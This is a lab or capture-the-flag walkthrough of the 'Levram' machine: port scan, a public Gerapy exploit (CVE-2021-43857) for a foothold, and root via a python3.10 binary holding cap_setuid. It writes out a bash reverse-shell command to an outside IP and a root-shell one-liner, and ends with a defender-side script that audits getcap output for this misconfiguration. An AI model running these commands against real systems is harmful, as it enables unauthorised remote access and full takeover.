Levram
Privilege Escalation via Python Binary with cap_setuid
Summary
Discovered only two open ports: SSH (22) and a web server (8000) running Gerapy.
Gerapy was running a vulnerable version, which led to authenticated command execution.
Exploited CVE-2021-43857 to gain an initial foothold.
Privilege escalation achieved via the cap_setuid capability assigned to the Python3 binary, allowing elevation to root.
🧵 Let's Unpack
Enumeration
sudo nmap -A -T4 -sV -sC -p- -Pn 192.168.229.24 --open
Open Ports:
22/tcp
→ OpenSSH 8.9p1 Ubuntu
8000/tcp
→ Gerapy (WSGIServer/0.2 CPython/3.10.6)
📌 Interesting Findings:
Gerapy panel hosted on port 8000.
Web title confirmed it was running Gerapy.
No robots.txt or other web paths were exposed; the version had to be verified manually before exploitation.
Initial Foothold
Used the public exploit for Gerapy RCE: → CVE-2021-43857
The exploit chain allowed remote code execution by abusing insecure project configuration and file inclusion.
# Executed payload for reverse shell
bash -i >& /dev/tcp/192.168.45.240/9999 0>&1
✅ Received reverse shell from Gerapy web context.
Privilege Escalation
getcap -r / 2>/dev/null
/snap/core20/1518/usr/bin/ping cap_net_raw=ep
/snap/core20/1891/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
Found this:
/usr/bin/python3.10 cap_setuid=ep
cap_setuid lets the binary call setuid() to any UID, root included; on an interpreter that any local user can run, this is equivalent to a root shell.
From GTFOBins – Python:
python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
🧨 Boom! Got a root shell.
# Upgraded shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
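As an added defender-side check that is not part of the original writeup: this Python script parses `getcap -r` output (both the current `path caps=flags` style seen above and the older `path = caps+flags` style) and reports interpreters such as python3.10 that carry identity-changing capabilities, which is exactly the finding that gave root here. The RISKY_CAPS and INTERPRETERS lists are my own assumptions, and the sample block reuses lines from the writeup's getcap output.

```python
import subprocess
# File capabilities that let a process change identity or bypass DAC; granted to
# an interpreter, they hand any local user the root shell shown above.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
              "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace"}
# Binaries that run caller-supplied code (assumed list, extend as needed).
INTERPRETERS = ("python", "perl", "ruby", "php", "node", "lua", "gdb")

def parse_getcap_line(line):
    """Return (path, caps, flags) for one 'getcap -r' line, or None for anything
    else. Paths with spaces and multi-set lines are not handled (assumption)."""
    tokens = line.split()
    if len(tokens) == 3 and tokens[1] == "=":  # older libcap: 'path = caps+flags'
        tokens, sep = tokens[::2], "+"
    else:
        sep = "="                              # newer libcap: 'path caps=flags'
    if len(tokens) != 2 or sep not in tokens[1]:
        return None                            # blank line, prompt residue, ...
    caps, _, flags = tokens[1].partition(sep)
    return tokens[0], set(caps.split(",")), flags

def audit_getcap(output):
    """List (path, sorted risky caps, flags) for interpreters holding a risky cap.
    Flags: e=effective, p=permitted, i=inheritable; permitted-only still counts."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        risky = caps & RISKY_CAPS
        if risky and path.rsplit("/", 1)[-1].startswith(INTERPRETERS):
            findings.append((path, sorted(risky), flags))
    return findings

# Sample input: three lines from the getcap output captured in the writeup above.
SAMPLE = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
"""

if __name__ == "__main__":
    try:  # audit the live system when getcap exists, otherwise the sample
        out = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                             stderr=subprocess.DEVNULL, text=True).stdout
    except FileNotFoundError:
        out = SAMPLE
    for path, caps, flags in audit_getcap(out):
        print(f"RISK {path}: {','.join(caps)}={flags}")
```

Run it as the audited host's unprivileged user, or feed it saved `getcap -r / 2>/dev/null` output from a fleet to find the same misconfiguration at scale.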